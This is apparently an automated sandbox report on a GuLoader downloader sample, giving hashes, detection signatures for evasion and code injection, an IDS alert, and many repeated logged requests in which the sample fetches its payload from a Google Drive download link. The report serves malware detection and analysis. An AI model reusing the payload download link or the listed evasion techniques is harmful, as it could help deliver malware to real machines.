Windows Analysis Report
QNuQ5e175D.exe

Overview

General Information

Sample name:QNuQ5e175D.exe
renamed because original name is a hash value
Original sample name:e5fd95536576d21b43b1552aed3040ea366375b5a952c333dd89f1ed251c12aa.exe
Analysis ID:1588755
MD5:9bb2cdb8508ee2255a35ecec43462a48
SHA1:c7465e8b0a3ae61b23520752afbb8bf89a3cecdd
SHA256:e5fd95536576d21b43b1552aed3040ea366375b5a952c333dd89f1ed251c12aa
Tags:exe, signed, user-adrian__luca
Infos:

Detection

GuLoader
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • QNuQ5e175D.exe (PID: 7644 cmdline: "C:\Users\user\Desktop\QNuQ5e175D.exe" MD5: 9BB2CDB8508EE2255A35ECEC43462A48)
    • QNuQ5e175D.exe (PID: 7988 cmdline: "C:\Users\user\Desktop\QNuQ5e175D.exe" MD5: 9BB2CDB8508EE2255A35ECEC43462A48)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source: 00000000.00000002.1535894824.000000000446C000.00000040.00001000.00020000.00000000.sdmp
Rule: JoeSecurity_GuLoader_2
Description: Yara detected GuLoader
Author: Joe Security
Strings:

Source: 00000003.00000002.2559418196.00000000017EC000.00000040.00000400.00020000.00000000.sdmp
Rule: JoeSecurity_GuLoader_2
Description: Yara detected GuLoader
Author: Joe Security
Strings:
      No Sigma rule has matched
      Timestamp: 2025-01-11T05:06:01.073774+0100
      SID: 2803270
      Severity: 2
      Classtype: Potentially Bad Traffic
      Source IP: 192.168.2.11
      Source Port: 49854
      Destination IP: 172.217.16.142
      Destination Port: 443
      Protocol: TCP


      AV Detection

      Source: QNuQ5e175D.exe, Virustotal: Detection: 63%
      Source: QNuQ5e175D.exe, ReversingLabs: Detection: 44%
      Source: Submited Sample, Integrated Neural Analysis Model: Matched 100.0% probability
      Source: QNuQ5e175D.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknown, HTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:49854 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 142.250.184.225:443 -> 192.168.2.11:49860 version: TLS 1.2
      Source: QNuQ5e175D.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe, Code function: 0_2_004068D4 FindFirstFileW,FindClose,0_2_004068D4
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe, Code function: 0_2_00405C83 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C83
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe, Code function: 0_2_00402930 FindFirstFileW,0_2_00402930
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe, Code function: 3_2_00402930 FindFirstFileW,3_2_00402930
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe, Code function: 3_2_004068D4 FindFirstFileW,FindClose,3_2_004068D4
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe, Code function: 3_2_00405C83 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405C83
      Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49854 -> 172.217.16.142:443
      Source: global traffic, HTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0, Host: drive.google.com, Cache-Control: no-cache
      Source: global traffic, HTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0, Cache-Control: no-cache, Host: drive.usercontent.google.com, Connection: Keep-Alive
      Source: global traffic, HTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0, Host: drive.google.com, Cache-Control: no-cache, Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global traffic, HTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0, Cache-Control: no-cache, Host: drive.usercontent.google.com, Connection: Keep-Alive, Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
